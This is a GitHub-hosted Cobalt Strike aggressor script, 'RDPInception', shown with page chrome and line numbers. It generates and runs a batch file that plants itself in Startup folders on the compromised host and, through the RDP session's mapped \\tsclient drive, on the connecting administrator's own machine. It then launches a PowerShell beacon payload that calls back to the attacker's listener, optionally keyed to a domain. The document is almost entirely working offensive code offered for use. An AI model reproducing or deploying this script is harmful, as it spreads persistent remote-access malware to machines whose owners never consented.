-
Notifications
You must be signed in to change notification settings - Fork 325
/
Copy pathrdpinception.cna
68 lines (49 loc) · 2.32 KB
/
rdpinception.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
# RDPInception
#
# Written by Vincent Yiu @vysecurity
alias rdpinception {
rdpincept($1,$2);
}
sub rdpincept {
$beacon = $1;
$domain = $2;
# Force select a payload
openPayloadHelper(lambda({
$listener = $1;
blog($beacon, "RDPIncepting listener: $listener");
$buffer = "@echo off\r\n";
$buffer = $buffer . "timeout 1 >nul 2>&1\r\n";
$buffer = $buffer . "mkdir \\\\tsclient\\c\\temp >nul 2>&1\r\n";
$buffer = $buffer . "mkdir C:\\temp >nul 2>&1\r\n";
$buffer = $buffer . "copy run.bat C:\\temp >nul 2>&1\r\n";
$buffer = $buffer . "copy run.bat \\\\tsclient\\c\\temp >nul 2>&1\r\n";
$buffer = $buffer . "del /q %TEMP%\\temp_00.txt >nul 2>&1\r\n";
$buffer = $buffer . "set dirs=dir /a:d /b /s C:\\users\\*Startup*\r\n";
$buffer = $buffer . "set dirs2=dir /a:d /b /s \\\\tsclient\\c\\users\\*startup*\r\n";
$buffer = $buffer . "echo|%dirs%|findstr /i \"Microsoft\\Windows\\Start Menu\\Programs\\Startup\">>\"%TEMP%\\temp_00.txt\"\r\n";
$buffer = $buffer . "echo|%dirs2%|findstr /i \"Microsoft\\Windows\\Start Menu\\Programs\\Startup\">>\"%TEMP%\\temp_00.txt\"\r\n";
$buffer = $buffer . "for /F \"tokens=*\" %%a in (%TEMP%\\temp_00.txt) DO (\r\n";
$buffer = $buffer . " copy run.bat \"%%a\" >nul 2>&1\r\n";
$buffer = $buffer . " copy C:\\temp\\run.bat \"%%a\" >nul 2>&1\r\n";
$buffer = $buffer . " copy \\\\tsclient\\c\\temp\\run.bat \"%%a\" >nul 2>&1\r\n";
$buffer = $buffer . ")\r\n";
$buffer = $buffer . "del /q %TEMP%\\temp_00.txt >nul 2>&1\r\n";
# Keying by Domain
if ($domain){
$buffer = $buffer . "If \"" . $domain . "\"==\"%USERDOMAIN%\" (";
$buffer = $buffer . powershell($listener, false) . ")";
}
else{
$buffer = $buffer . powershell($listener, false);
}
blog($beacon, $buffer);
blog($beacon, "Infecting machine with RDPInception.");
bmkdir($beacon, "C:\\temp");
bupload_raw($beacon, "C:\\temp\\run.bat", $buffer);
blog($beacon, "Executing RDPInception from C:\\temp\\run.bat");
bshell($beacon, "C:\\temp\\run.bat");
}, $bids => $1));
}
beacon_command_register("rdpinception", "Infects the machine with RDPInception",
"Synopsis: rdpinception [DOMAIN Key]\n\n" .
"Infects the machine with RDPInception, a HTTP, HTTPS or DNS payload that can egress is recommended.");